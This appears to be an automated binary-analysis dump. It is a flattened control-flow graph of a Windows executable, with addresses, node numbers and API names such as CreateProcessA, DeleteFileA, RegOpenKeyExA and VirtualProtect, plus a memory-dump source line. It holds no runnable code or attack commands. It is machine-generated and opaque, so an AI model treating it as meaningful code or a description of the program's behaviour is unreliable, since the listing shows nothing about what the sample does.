5676->5768 5681 409f0c 5745 403340 5681->5745 5683 409f1a 5684 4031e8 4 API calls 5683->5684 5685 409f2a 5684->5685 5686 4074e0 23 API calls 5685->5686 5687 409f69 5686->5687 5688 402594 4 API calls 5687->5688 5689 409f89 5688->5689 5690 407a28 5 API calls 5689->5690 5691 409fcb 5690->5691 5692 407cb8 21 API calls 5691->5692 5693 409ff2 5692->5693 5772 40953c 5694->5772 5699->5665 5703 409350 5700->5703 5704 409375 CreateDirectoryA 5703->5704 5709 408dd8 4 API calls 5703->5709 5714 407284 5 API calls 5703->5714 5717 405880 4 API calls 5703->5717 5864 406cf4 5703->5864 5887 409224 5703->5887 5906 404c84 5703->5906 5909 408da8 5703->5909 5705 4093ed 5704->5705 5706 40937f GetLastError 5704->5706 5707 40322c 4 API calls 5705->5707 5706->5703 5708 4093f7 5707->5708 5710 4031b8 4 API calls 5708->5710 5709->5703 5712 409411 5710->5712 5713 4031b8 4 API calls 5712->5713 5715 40941e 5713->5715 5714->5703 5715->5670 5717->5703 6019 406820 5718->6019 5721 403454 4 API calls 5722 40694a 5721->5722 5723 4066c0 5722->5723 6024 4068e4 5723->6024 5726 4066f0 5728 403340 4 API calls 5726->5728 5727 4066fe 5729 403454 4 API calls 5727->5729 5730 4066fc 5728->5730 5731 406711 5729->5731 5733 403198 4 API calls 5730->5733 5732 403340 4 API calls 5731->5732 5732->5730 5734 406733 5733->5734 5735 406638 5734->5735 5736 406642 5735->5736 5737 406665 5735->5737 6030 406950 5736->6030 5738 40322c 4 API calls 5737->5738 5740 40666e 5738->5740 5740->5681 5741 406649 5741->5737 5742 406654 5741->5742 5743 403340 4 API calls 5742->5743 5744 406662 5743->5744 5744->5681 5746 403344 5745->5746 5747 4033a5 5745->5747 5748 40334c 5746->5748 5749 4031e8 5746->5749 5748->5747 5751 4031e8 4 API calls 5748->5751 5754 40335b 5748->5754 5753 403254 4 API calls 5749->5753 5755 4031fc 5749->5755 5750 403228 5750->5683 5751->5754 5752 403254 4 API calls 5757 403375 5752->5757 5753->5755 5754->5752 5755->5750 5756 4025ac 4 API calls 5755->5756 5756->5750 5758 4031e8 4 API calls 5757->5758 5759 4033a1 
5758->5759 5759->5683 5761 403154 4 API calls 5760->5761 5762 402f29 5761->5762 6036 402bcc 5762->6036 5764 402f51 5764->5764 5766 408da8 4 API calls 5765->5766 5767 408df4 5766->5767 5767->5671 5769 405859 5768->5769 5770 405930 5 API calls 5769->5770 5771 40586b 5770->5771 5771->5771 5778 40955b 5772->5778 5773 409590 5775 40959d GetUserDefaultLangID 5773->5775 5780 409592 5773->5780 5774 409594 5790 407024 GetModuleHandleA GetProcAddress 5774->5790 5775->5780 5778->5773 5778->5774 5779 40956f 5778->5779 5784 409884 5779->5784 5780->5779 5781 4095cb GetACP 5780->5781 5782 4095ef 5780->5782 5781->5779 5781->5780 5782->5779 5783 409615 GetACP 5782->5783 5783->5779 5783->5782 5785 40988c 5784->5785 5789 4098c6 5784->5789 5786 403420 4 API calls 5785->5786 5785->5789 5787 4098c0 5786->5787 5848 408e80 5787->5848 5789->5666 5791 407067 5790->5791 5792 40705e 5790->5792 5793 407070 5791->5793 5794 4070a8 5791->5794 5803 403198 4 API calls 5792->5803 5811 406f68 5793->5811 5796 406f68 RegOpenKeyExA 5794->5796 5798 4070c1 5796->5798 5797 407089 5799 4070de 5797->5799 5814 406f5c 5797->5814 5798->5799 5800 406f5c 6 API calls 5798->5800 5801 40322c 4 API calls 5799->5801 5804 4070d5 RegCloseKey 5800->5804 5805 4070eb 5801->5805 5807 407120 5803->5807 5804->5799 5817 4032fc 5805->5817 5809 403198 4 API calls 5807->5809 5810 407128 5809->5810 5810->5780 5812 406f73 5811->5812 5813 406f79 RegOpenKeyExA 5811->5813 5812->5813 5813->5797 5831 406e10 5814->5831 5818 403300 5817->5818 5819 40333f 5817->5819 5820 40330a 5818->5820 5824 4031e8 5818->5824 5819->5792 5821 403334 5820->5821 5822 40331d 5820->5822 5825 4034f0 4 API calls 5821->5825 5823 4034f0 4 API calls 5822->5823 5830 403322 5823->5830 5827 403254 4 API calls 5824->5827 5828 4031fc 5824->5828 5825->5830 5826 403228 5826->5792 5827->5828 5828->5826 5829 4025ac 4 API calls 5828->5829 5829->5826 5830->5792 5832 406e36 RegQueryValueExA 5831->5832 5833 406e7b 5832->5833 5838 406e59 5832->5838 5835 403198 4 API calls 
5833->5835 5834 406e73 5836 403198 4 API calls 5834->5836 5837 406f47 RegCloseKey 5835->5837 5836->5833 5837->5799 5838->5833 5838->5834 5839 403278 4 API calls 5838->5839 5840 403420 4 API calls 5838->5840 5839->5838 5841 406eb0 RegQueryValueExA 5840->5841 5841->5832 5842 406ecc 5841->5842 5842->5833 5843 4034f0 4 API calls 5842->5843 5844 406f0e 5843->5844 5845 406f20 5844->5845 5847 403420 4 API calls 5844->5847 5846 4031e8 4 API calls 5845->5846 5846->5833 5847->5845 5849 408e8e 5848->5849 5851 408ea6 5849->5851 5861 408e18 5849->5861 5852 408e18 4 API calls 5851->5852 5853 408eca 5851->5853 5852->5853 5854 407918 InterlockedExchange 5853->5854 5855 408ee5 5854->5855 5856 408e18 4 API calls 5855->5856 5858 408ef8 5855->5858 5856->5858 5857 408e18 4 API calls 5857->5858 5858->5857 5859 403278 4 API calls 5858->5859 5860 408f27 5858->5860 5859->5858 5860->5789 5862 405880 4 API calls 5861->5862 5863 408e29 5862->5863 5863->5851 5913 406a58 5864->5913 5867 406d26 5869 406a58 5 API calls 5867->5869 5871 406d72 5867->5871 5870 406d36 5869->5870 5872 406a34 7 API calls 5870->5872 5873 406d42 5870->5873 5921 406888 5871->5921 5872->5873 5873->5871 5875 406a58 5 API calls 5873->5875 5884 406d67 5873->5884 5879 406d5b 5875->5879 5878 406638 5 API calls 5880 406d87 5878->5880 5882 406a34 7 API calls 5879->5882 5879->5884 5881 40322c 4 API calls 5880->5881 5883 406d91 5881->5883 5882->5884 5885 4031b8 4 API calls 5883->5885 5884->5871 5933 406cc8 GetWindowsDirectoryA 5884->5933 5886 406dab 5885->5886 5886->5703 5888 409244 5887->5888 5889 406638 5 API calls 5888->5889 5890 40925d 5889->5890 5891 40322c 4 API calls 5890->5891 5898 409268 5891->5898 5893 406978 6 API calls 5893->5898 5894 4033b4 4 API calls 5894->5898 5895 408dd8 4 API calls 5895->5898 5897 405880 4 API calls 5897->5898 5898->5893 5898->5894 5898->5895 5898->5897 5899 4092e4 5898->5899 5973 4091b0 5898->5973 5981 409034 5898->5981 5900 40322c 4 API calls 5899->5900 5901 4092ef 5900->5901 5902 4031b8 4 API 
calls 5901->5902 5903 409309 5902->5903 5904 403198 4 API calls 5903->5904 5905 409311 5904->5905 5905->5703 5907 405198 19 API calls 5906->5907 5908 404ca2 5907->5908 5908->5703 5910 408dc8 5909->5910 6009 408c80 5910->6009 5914 4034f0 4 API calls 5913->5914 5915 406a6b 5914->5915 5916 406a82 GetEnvironmentVariableA 5915->5916 5920 406a95 5915->5920 5935 406dec 5915->5935 5916->5915 5917 406a8e 5916->5917 5918 403198 4 API calls 5917->5918 5918->5920 5920->5867 5930 406a34 5920->5930 5922 403414 5921->5922 5923 4068ab GetFullPathNameA 5922->5923 5924 4068b7 5923->5924 5925 4068ce 5923->5925 5924->5925 5926 4068bf 5924->5926 5927 40322c 4 API calls 5925->5927 5928 403278 4 API calls 5926->5928 5929 4068cc 5927->5929 5928->5929 5929->5878 5939 4069dc 5930->5939 5934 406ce9 5933->5934 5934->5871 5936 406dfa 5935->5936 5937 4034f0 4 API calls 5936->5937 5938 406e08 5937->5938 5938->5915 5946 406978 5939->5946 5941 4069fe 5942 406a06 GetFileAttributesA 5941->5942 5943 406a1b 5942->5943 5944 403198 4 API calls 5943->5944 5945 406a23 5944->5945 5945->5867 5956 406744 5946->5956 5948 4069b0 5951 4069c6 5948->5951 5952 4069bb 5948->5952 5950 406989 5950->5948 5963 406970 CharPrevA 5950->5963 5964 403454 5951->5964 5953 40322c 4 API calls 5952->5953 5955 4069c4 5953->5955 5955->5941 5960 406755 5956->5960 5957 4067b9 5958 4067b4 5957->5958 5959 406680 IsDBCSLeadByte 5957->5959 5958->5950 5959->5958 5960->5957 5962 406773 5960->5962 5962->5958 5971 406680 IsDBCSLeadByte 5962->5971 5963->5950 5965 403486 5964->5965 5966 403459 5964->5966 5967 403198 4 API calls 5965->5967 5966->5965 5969 40346d 5966->5969 5968 40347c 5967->5968 5968->5955 5970 403278 4 API calls 5969->5970 5970->5968 5972 406694 5971->5972 5972->5962 5974 403198 4 API calls 5973->5974 5976 4091d1 5974->5976 5978 4091fe 5976->5978 5990 4032a8 5976->5990 5993 403494 5976->5993 5979 403198 4 API calls 5978->5979 5980 409213 5979->5980 5980->5898 5997 408f70 5981->5997 5983 40904a 5984 40904e 5983->5984 6003 
406a48 5983->6003 5984->5898 5987 409081 6006 408fac 5987->6006 5991 403278 4 API calls 5990->5991 5992 4032b5 5991->5992 5992->5976 5994 4034c3 5993->5994 5995 403498 5993->5995 5994->5976 5996 4034f0 4 API calls 5995->5996 5996->5994 5998 408f7a 5997->5998 5999 408f7e 5997->5999 5998->5983 6000 408fa0 SetLastError 5999->6000 6001 408f87 Wow64DisableWow64FsRedirection 5999->6001 6002 408f9b 6000->6002 6001->6002 6002->5983 6004 4069dc 7 API calls 6003->6004 6005 406a52 GetLastError 6004->6005 6005->5987 6007 408fb1 Wow64RevertWow64FsRedirection 6006->6007 6008 408fbb 6006->6008 6007->6008 6008->5898 6010 403198 4 API calls 6009->6010 6011 408cb1 6009->6011 6010->6011 6013 408cc8 6011->6013 6015 403278 4 API calls 6011->6015 6017 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6011->6017 6018 408cdc 6011->6018 6012 4031b8 4 API calls 6014 408d69 6012->6014 6016 4032fc 4 API calls 6013->6016 6014->5703 6015->6011 6016->6018 6017->6011 6018->6012 6020 406744 IsDBCSLeadByte 6019->6020 6022 406835 6020->6022 6021 40687f 6021->5721 6022->6021 6023 406680 IsDBCSLeadByte 6022->6023 6023->6022 6025 4068f3 6024->6025 6026 406820 IsDBCSLeadByte 6025->6026 6029 4068fe 6026->6029 6027 4066ea 6027->5726 6027->5727 6028 406680 IsDBCSLeadByte 6028->6029 6029->6027 6029->6028 6031 406957 6030->6031 6032 40695b 6030->6032 6031->5741 6035 406970 CharPrevA 6032->6035 6034 40696c 6034->5741 6035->6034 6037 402bd5 RaiseException 6036->6037 6038 402be6 6036->6038 6037->6038 6038->5764 6291 402e64 6292 402e69 6291->6292 6293 402e7a RtlUnwind 6292->6293 6294 402e5e 6292->6294 6295 402e9d 6293->6295 6312 40667c IsDBCSLeadByte 6313 406694 6312->6313 6725 403f7d 6727 403fa2 6725->6727 6729 403f84 6725->6729 6726 403f8c 6728 403e8e 4 API calls 6727->6728 6727->6729 6728->6729 6729->6726 6730 402674 4 API calls 6729->6730 6731 403fca 6730->6731 6738 403d02 6740 403d12 6738->6740 6739 403ddf ExitProcess 6740->6739 6741 403db8 6740->6741 6743 403dea 6740->6743 6748 403da4 6740->6748 6749 
403d8f MessageBoxA 6740->6749 6742 403cc8 4 API calls 6741->6742 6744 403dc2 6742->6744 6745 403cc8 4 API calls 6744->6745 6746 403dcc 6745->6746 6758 4019dc 6746->6758 6754 403fe4 6748->6754 6749->6741 6750 403dd1 6750->6739 6750->6743 6755 403fe8 6754->6755 6756 403f07 4 API calls 6755->6756 6757 404006 6756->6757 6759 401abb 6758->6759 6760 4019ed 6758->6760 6759->6750 6761 401a04 RtlEnterCriticalSection 6760->6761 6762 401a0e LocalFree 6760->6762 6761->6762 6763 401a41 6762->6763 6764 401a2f VirtualFree 6763->6764 6765 401a49 6763->6765 6764->6763 6766 401a70 LocalFree 6765->6766 6767 401a87 6765->6767 6766->6766 6766->6767 6768 401aa9 RtlDeleteCriticalSection 6767->6768 6769 401a9f RtlLeaveCriticalSection 6767->6769 6768->6750 6769->6768 6322 404206 6323 4041cc 6322->6323 6326 40420a 6322->6326 6324 404282 6325 403154 4 API calls 6327 404323 6325->6327 6326->6324 6326->6325 6328 402c08 6331 402c82 6328->6331 6332 402c19 6328->6332 6329 402c56 RtlUnwind 6330 403154 4 API calls 6329->6330 6330->6331 6332->6329 6332->6331 6335 402b28 6332->6335 6336 402b31 RaiseException 6335->6336 6337 402b47 6335->6337 6336->6337 6337->6329 6338 408c10 6339 408c17 6338->6339 6340 403198 4 API calls 6339->6340 6347 408cb1 6340->6347 6341 408cdc 6342 4031b8 4 API calls 6341->6342 6344 408d69 6342->6344 6343 408cc8 6346 4032fc 4 API calls 6343->6346 6345 403278 4 API calls 6345->6347 6346->6341 6347->6341 6347->6343 6347->6345 6348 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6347->6348 6348->6347 6349 40a011 6350 40a036 6349->6350 6351 407918 InterlockedExchange 6350->6351 6353 40a060 6351->6353 6352 40a070 6359 4076ac SetEndOfFile 6352->6359 6353->6352 6354 409aa0 4 API calls 6353->6354 6354->6352 6356 40a08c 6357 4025ac 4 API calls 6356->6357 6358 40a0c3 6357->6358 6360 4076c3 6359->6360 6361 4076bc 6359->6361 6360->6356 6362 40748c 21 API calls 6361->6362 6362->6360 6774 409916 6775 409918 6774->6775 6776 409956 CallWindowProcA 6775->6776 6777 40993a 6775->6777 
6776->6777 6090 407017 6091 407008 SetErrorMode 6090->6091 6367 403018 6368 403070 6367->6368 6369 403025 6367->6369 6370 40302a RtlUnwind 6369->6370 6371 40304e 6370->6371 6373 402f78 6371->6373 6374 402be8 6371->6374 6375 402bf1 RaiseException 6374->6375 6376 402c04 6374->6376 6375->6376 6376->6368 6784 409918 6785 40993a 6784->6785 6787 409927 6784->6787 6786 409956 CallWindowProcA 6786->6785 6787->6785 6787->6786 6381 40901e 6382 409010 6381->6382 6383 408fac Wow64RevertWow64FsRedirection 6382->6383 6384 409018 6383->6384 6385 409020 SetLastError 6386 409029 6385->6386 6397 403a28 ReadFile 6398 403a46 6397->6398 6399 403a49 GetLastError 6397->6399 6228 40762c ReadFile 6229 407663 6228->6229 6230 40764c 6228->6230 6231 407652 GetLastError 6230->6231 6232 40765c 6230->6232 6231->6229 6231->6232 6233 40748c 21 API calls 6232->6233 6233->6229 6404 40a02c 6405 409aa0 4 API calls 6404->6405 6406 40a031 6405->6406 6407 40a036 6406->6407 6408 402f24 5 API calls 6406->6408 6409 407918 InterlockedExchange 6407->6409 6408->6407 6410 40a060 6409->6410 6411 40a070 6410->6411 6412 409aa0 4 API calls 6410->6412 6413 4076ac 22 API calls 6411->6413 6412->6411 6414 40a08c 6413->6414 6415 4025ac 4 API calls 6414->6415 6416 40a0c3 6415->6416 6788 40712e 6789 407118 6788->6789 6790 403198 4 API calls 6789->6790 6791 407120 6790->6791 6792 403198 4 API calls 6791->6792 6793 407128 6792->6793 6794 408f30 6797 408dfc 6794->6797 6798 408e05 6797->6798 6799 403198 4 API calls 6798->6799 6800 408e13 6798->6800 6799->6798 6801 403932 6802 403924 6801->6802 6805 40374c 6802->6805 6804 40392c 6806 403766 6805->6806 6807 403759 6805->6807 6806->6804 6807->6806 6808 403779 VariantClear 6807->6808 6808->6804 6039 4075c4 SetFilePointer 6040 4075f7 6039->6040 6041 4075e7 GetLastError 6039->6041 6041->6040 6042 4075f0 6041->6042 6043 40748c 21 API calls 6042->6043 6043->6040 6417 405ac4 6418 405ad4 6417->6418 6419 405acc 6417->6419 6420 405ad2 6419->6420 6421 405adb 6419->6421 6424 405a3c 
6420->6424 6422 405930 5 API calls 6421->6422 6422->6418 6425 405a44 6424->6425 6426 405a5e 6425->6426 6427 403154 4 API calls 6425->6427 6428 405a63 6426->6428 6429 405a7a 6426->6429 6427->6425 6430 405930 5 API calls 6428->6430 6431 403154 4 API calls 6429->6431 6432 405a76 6430->6432 6433 405a7f 6431->6433 6435 403154 4 API calls 6432->6435 6434 4059a0 19 API calls 6433->6434 6434->6432 6436 405aa8 6435->6436 6437 403154 4 API calls 6436->6437 6438 405ab6 6437->6438 6438->6418 6439 4076c8 WriteFile 6440 4076e8 6439->6440 6441 4076ef 6439->6441 6442 40748c 21 API calls 6440->6442 6443 407700 6441->6443 6444 4073ec 20 API calls 6441->6444 6442->6441 6444->6443 6445 40a2ca 6454 4096fc 6445->6454 6448 402f24 5 API calls 6449 40a2d4 6448->6449 6450 403198 4 API calls 6449->6450 6451 40a2f3 6450->6451 6452 403198 4 API calls 6451->6452 6453 40a2fb 6452->6453 6463 40569c 6454->6463 6456 409745 6460 403198 4 API calls 6456->6460 6457 409717 6457->6456 6469 40720c 6457->6469 6459 409735 6462 40973d MessageBoxA 6459->6462 6461 40975a 6460->6461 6461->6448 6462->6456 6464 403154 4 API calls 6463->6464 6465 4056a1 6464->6465 6466 4056b9 6465->6466 6467 403154 4 API calls 6465->6467 6466->6457 6468 4056af 6467->6468 6468->6457 6470 40569c 4 API calls 6469->6470 6471 40721b 6470->6471 6472 407221 6471->6472 6473 40722f 6471->6473 6474 40322c 4 API calls 6472->6474 6476 40724b 6473->6476 6477 40723f 6473->6477 6475 40722d 6474->6475 6475->6459 6487 4032b8 6476->6487 6480 4071d0 6477->6480 6481 40322c 4 API calls 6480->6481 6482 4071df 6481->6482 6483 4071fc 6482->6483 6484 406950 CharPrevA 6482->6484 6483->6475 6485 4071eb 6484->6485 6485->6483 6486 4032fc 4 API calls 6485->6486 6486->6483 6488 403278 4 API calls 6487->6488 6489 4032c2 6488->6489 6489->6475 6490 402ccc 6491 402cdd 6490->6491 6495 402cfe 6490->6495 6492 402d88 RtlUnwind 6491->6492 6494 402b28 RaiseException 6491->6494 6491->6495 6493 403154 4 API calls 6492->6493 6493->6495 6496 402d7f 6494->6496 6496->6492 
6817 403fcd 6818 403f07 4 API calls 6817->6818 6819 403fd6 6818->6819 6820 403e9c 4 API calls 6819->6820 6821 403fe2 6820->6821 5475 4024d0 5476 4024e4 5475->5476 5477 4024f7 5475->5477 5514 401918 RtlInitializeCriticalSection 5476->5514 5479 402518 5477->5479 5480 40250e RtlEnterCriticalSection 5477->5480 5491 402300 5479->5491 5480->5479 5483 4024ed 5485 402525 5488 402581 5485->5488 5489 402577 RtlLeaveCriticalSection 5485->5489 5487 402531 5487->5485 5521 40215c 5487->5521 5489->5488 5492 402314 5491->5492 5493 402335 5492->5493 5494 4023b8 5492->5494 5495 402344 5493->5495 5535 401b74 5493->5535 5494->5495 5499 402455 5494->5499 5538 401d80 5494->5538 5546 401e84 5494->5546 5495->5485 5501 401fd4 5495->5501 5499->5495 5542 401d00 5499->5542 5502 401fe8 5501->5502 5503 401ffb 5501->5503 5505 401918 4 API calls 5502->5505 5504 402012 RtlEnterCriticalSection 5503->5504 5508 40201c 5503->5508 5504->5508 5506 401fed 5505->5506 5506->5503 5507 401ff1 5506->5507 5511 402052 5507->5511 5508->5511 5628 401ee0 5508->5628 5511->5487 5512 402147 5512->5487 5513 40213d RtlLeaveCriticalSection 5513->5512 5515 40193c RtlEnterCriticalSection 5514->5515 5516 401946 5514->5516 5515->5516 5517 401964 LocalAlloc 5516->5517 5518 40197e 5517->5518 5519 4019c3 RtlLeaveCriticalSection 5518->5519 5520 4019cd 5518->5520 5519->5520 5520->5477 5520->5483 5522 40217a 5521->5522 5523 402175 5521->5523 5525 4021ab RtlEnterCriticalSection 5522->5525 5528 4021b5 5522->5528 5529 40217e 5522->5529 5524 401918 4 API calls 5523->5524 5524->5522 5525->5528 5526 4021c1 5530 4022e3 RtlLeaveCriticalSection 5526->5530 5531 4022ed 5526->5531 5527 402244 5527->5529 5532 401d80 7 API calls 5527->5532 5528->5526 5528->5527 5533 402270 5528->5533 5529->5485 5530->5531 5531->5485 5532->5529 5533->5526 5534 401d00 7 API calls 5533->5534 5534->5526 5536 40215c 9 API calls 5535->5536 5537 401b95 5536->5537 5537->5495 5539 401d89 5538->5539 5540 401d92 5538->5540 5539->5540 5541 401b74 9 API calls 5539->5541 
5540->5494 5541->5540 5543 401d4e 5542->5543 5544 401d1e 5542->5544 5543->5544 5551 401c68 5543->5551 5544->5495 5606 401768 5546->5606 5548 401e99 5549 401ea6 5548->5549 5617 401dcc 5548->5617 5549->5494 5552 401c7a 5551->5552 5553 401c9d 5552->5553 5554 401caf 5552->5554 5564 40188c 5553->5564 5555 40188c 3 API calls 5554->5555 5557 401cad 5555->5557 5558 401cc5 5557->5558 5574 401b44 5557->5574 5558->5544 5560 401cd4 5561 401cee 5560->5561 5579 401b98 5560->5579 5584 4013a0 5561->5584 5565 4018b2 5564->5565 5566 40190b 5564->5566 5588 401658 5565->5588 5566->5557 5571 4018e6 5571->5566 5573 4013a0 LocalAlloc 5571->5573 5573->5566 5575 401b61 5574->5575 5576 401b52 5574->5576 5575->5560 5577 401d00 9 API calls 5576->5577 5578 401b5f 5577->5578 5578->5560 5580 401b9d 5579->5580 5582 401bab 5579->5582 5581 401b74 9 API calls 5580->5581 5583 401baa 5581->5583 5582->5561 5583->5561 5585 4013ab 5584->5585 5586 4013c6 5585->5586 5587 4012e4 LocalAlloc 5585->5587 5586->5558 5587->5586 5591 40168f 5588->5591 5589 4016cf 5592 40132c 5589->5592 5590 4016a9 VirtualFree 5590->5591 5591->5589 5591->5590 5593 401348 5592->5593 5600 4012e4 5593->5600 5596 40150c 5599 40153b 5596->5599 5597 401594 5597->5571 5598 401568 VirtualFree 5598->5599 5599->5597 5599->5598 5603 40128c 5600->5603 5604 401298 LocalAlloc 5603->5604 5605 4012aa 5603->5605 5604->5605 5605->5571 5605->5596 5608 401787 5606->5608 5607 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5607->5608 5608->5607 5609 40183b 5608->5609 5610 40132c LocalAlloc 5608->5610 5612 401821 5608->5612 5614 4017d6 5608->5614 5615 4017e7 5609->5615 5624 4015c4 5609->5624 5610->5608 5613 40150c VirtualFree 5612->5613 5613->5615 5616 40150c VirtualFree 5614->5616 5615->5548 5616->5615 5618 401d80 9 API calls 5617->5618 5619 401de0 5618->5619 5620 40132c LocalAlloc 5619->5620 5621 401df0 5620->5621 5622 401df8 5621->5622 5623 401b44 9 API calls 5621->5623 5622->5549 5623->5622 5625 40160a 5624->5625 5626 40163a 5625->5626 5627 
401626 VirtualAlloc 5625->5627 5626->5615 5627->5625 5627->5626 5631 401ef0 5628->5631 5629 401f1c 5630 401d00 9 API calls 5629->5630 5633 401f40 5629->5633 5630->5633 5631->5629 5631->5633 5634 401e58 5631->5634 5633->5512 5633->5513 5639 4016d8 5634->5639 5637 401e75 5637->5631 5638 401dcc 9 API calls 5638->5637 5642 4016f4 5639->5642 5640 4016fe 5643 4015c4 VirtualAlloc 5640->5643 5642->5640 5644 40175b 5642->5644 5645 40132c LocalAlloc 5642->5645 5646 40174f 5642->5646 5649 401430 5642->5649 5647 40170a 5643->5647 5644->5637 5644->5638 5645->5642 5648 40150c VirtualFree 5646->5648 5647->5644 5648->5644 5650 40143f VirtualAlloc 5649->5650 5652 40146c 5650->5652 5653 40148f 5650->5653 5654 4012e4 LocalAlloc 5652->5654 5653->5642 5655 401478 5654->5655 5655->5653 5656 40147c VirtualFree 5655->5656 5656->5653 6497 4028d2 6498 4028da 6497->6498 6499 403554 4 API calls 6498->6499 6500 4028ef 6498->6500 6499->6498 6501 4025ac 4 API calls 6500->6501 6502 4028f4 6501->6502 6822 4019d3 6823 4019ba 6822->6823 6824 4019c3 RtlLeaveCriticalSection 6823->6824 6825 4019cd 6823->6825 6824->6825 6044 407fd4 6045 407fe6 6044->6045 6047 407fed 6044->6047 6055 407f10 6045->6055 6048 408015 6047->6048 6049 408017 6047->6049 6053 408021 6047->6053 6069 407e2c 6048->6069 6066 407d7c 6049->6066 6050 40804e 6052 407d7c 19 API calls 6052->6050 6053->6050 6053->6052 6056 407f25 6055->6056 6057 407d7c 19 API calls 6056->6057 6058 407f34 6056->6058 6057->6058 6059 407f6e 6058->6059 6061 407d7c 19 API calls 6058->6061 6060 407f82 6059->6060 6062 407d7c 19 API calls 6059->6062 6065 407fae 6060->6065 6076 407eb8 6060->6076 6061->6059 6062->6060 6065->6047 6079 4058b4 6066->6079 6068 407d9e 6068->6053 6070 405184 19 API calls 6069->6070 6071 407e57 6070->6071 6087 407de4 6071->6087 6073 407e5f 6074 403198 4 API calls 6073->6074 6075 407e74 6074->6075 6075->6053 6077 407ec7 VirtualFree 6076->6077 6078 407ed9 VirtualAlloc 6076->6078 6077->6078 6078->6065 6080 4058c0 6079->6080 6081 405184 19 API 
calls 6080->6081 6082 4058ed 6081->6082 6083 4031e8 4 API calls 6082->6083 6084 4058f8 6083->6084 6085 403198 4 API calls 6084->6085 6086 40590d 6085->6086 6086->6068 6088 4058b4 19 API calls 6087->6088 6089 407e06 6088->6089 6089->6073 6507 40a0d5 6508 40a105 6507->6508 6509 40a10f CreateWindowExA SetWindowLongA 6508->6509 6510 405184 19 API calls 6509->6510 6511 40a192 6510->6511 6512 4032fc 4 API calls 6511->6512 6513 40a1a0 6512->6513 6514 4032fc 4 API calls 6513->6514 6515 40a1ad 6514->6515 6516 406b7c 5 API calls 6515->6516 6517 40a1b9 6516->6517 6518 4032fc 4 API calls 6517->6518 6519 40a1c2 6518->6519 6520 4099a4 29 API calls 6519->6520 6521 40a1d4 6520->6521 6522 409884 5 API calls 6521->6522 6523 40a1e7 6521->6523 6522->6523 6524 40a220 6523->6524 6525 4094d8 9 API calls 6523->6525 6526 40a239 6524->6526 6529 40a233 RemoveDirectoryA 6524->6529 6525->6524 6527 40a242 73EA5CF0 6526->6527 6528 40a24d 6526->6528 6527->6528 6530 40a275 6528->6530 6531 40357c 4 API calls 6528->6531 6529->6526 6532 40a26b 6531->6532 6533 4025ac 4 API calls 6532->6533 6533->6530 6092 40a0e7 6093 40a0eb SetLastError 6092->6093 6124 409648 GetLastError 6093->6124 6096 40a105 6098 40a10f CreateWindowExA SetWindowLongA 6096->6098 6097 402f24 5 API calls 6097->6096 6099 405184 19 API calls 6098->6099 6100 40a192 6099->6100 6101 4032fc 4 API calls 6100->6101 6102 40a1a0 6101->6102 6103 4032fc 4 API calls 6102->6103 6104 40a1ad 6103->6104 6137 406b7c GetCommandLineA 6104->6137 6107 4032fc 4 API calls 6108 40a1c2 6107->6108 6142 4099a4 6108->6142 6111 409884 5 API calls 6112 40a1e7 6111->6112 6113 40a220 6112->6113 6114 40a207 6112->6114 6116 40a239 6113->6116 6119 40a233 RemoveDirectoryA 6113->6119 6158 4094d8 6114->6158 6117 40a242 73EA5CF0 6116->6117 6118 40a24d 6116->6118 6117->6118 6120 40a275 6118->6120 6166 40357c 6118->6166 6119->6116 6122 40a26b 6123 4025ac 4 API calls 6122->6123 6123->6120 6125 404c84 19 API calls 6124->6125 6126 40968f 6125->6126 6127 407284 5 API calls 
6126->6127 6128 40969f 6127->6128 6129 408da8 4 API calls 6128->6129 6130 4096b4 6129->6130 6131 405880 4 API calls 6130->6131 6132 4096c3 6131->6132 6133 4031b8 4 API calls 6132->6133 6134 4096e2 6133->6134 6135 403198 4 API calls 6134->6135 6136 4096ea 6135->6136 6136->6096 6136->6097 6138 406af0 4 API calls 6137->6138 6139 406ba1 6138->6139 6140 403198 4 API calls 6139->6140 6141 406bbf 6140->6141 6141->6107 6143 4033b4 4 API calls 6142->6143 6144 4099df 6143->6144 6145 409a11 CreateProcessA 6144->6145 6146 409a24 CloseHandle 6145->6146 6147 409a1d 6145->6147 6149 409a2d 6146->6149 6148 409648 21 API calls 6147->6148 6148->6146 6179 409978 6149->6179 6152 409a49 6153 409978 3 API calls 6152->6153 6154 409a4e GetExitCodeProcess CloseHandle 6153->6154 6155 409a6e 6154->6155 6156 403198 4 API calls 6155->6156 6157 409a76 6156->6157 6157->6111 6157->6112 6159 409532 6158->6159 6161 4094eb 6158->6161 6159->6113 6160 4094f3 Sleep 6160->6161 6161->6159 6161->6160 6162 409503 Sleep 6161->6162 6164 40951a GetLastError 6161->6164 6183 408fbc 6161->6183 6162->6161 6164->6159 6165 409524 GetLastError 6164->6165 6165->6159 6165->6161 6167 403591 6166->6167 6168 4035a0 6166->6168 6173 4035d0 6167->6173 6174 40359b 6167->6174 6176 4035b6 6167->6176 6169 4035b1 6168->6169 6170 4035b8 6168->6170 6171 403198 4 API calls 6169->6171 6172 4031b8 4 API calls 6170->6172 6171->6176 6172->6176 6173->6176 6177 40357c 4 API calls 6173->6177 6174->6168 6175 4035ec 6174->6175 6175->6176 6191 403554 6175->6191 6176->6122 6177->6173 6180 40998c PeekMessageA 6179->6180 6181 409980 TranslateMessage DispatchMessageA 6180->6181 6182 40999e MsgWaitForMultipleObjects 6180->6182 6181->6180 6182->6149 6182->6152 6184 408f70 2 API calls 6183->6184 6185 408fd2 6184->6185 6186 408fd6 6185->6186 6187 408ff2 DeleteFileA GetLastError 6185->6187 6186->6161 6188 409010 6187->6188 6189 408fac Wow64RevertWow64FsRedirection 6188->6189 6190 409018 6189->6190 6190->6161 6192 403566 6191->6192 6194 403578 

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
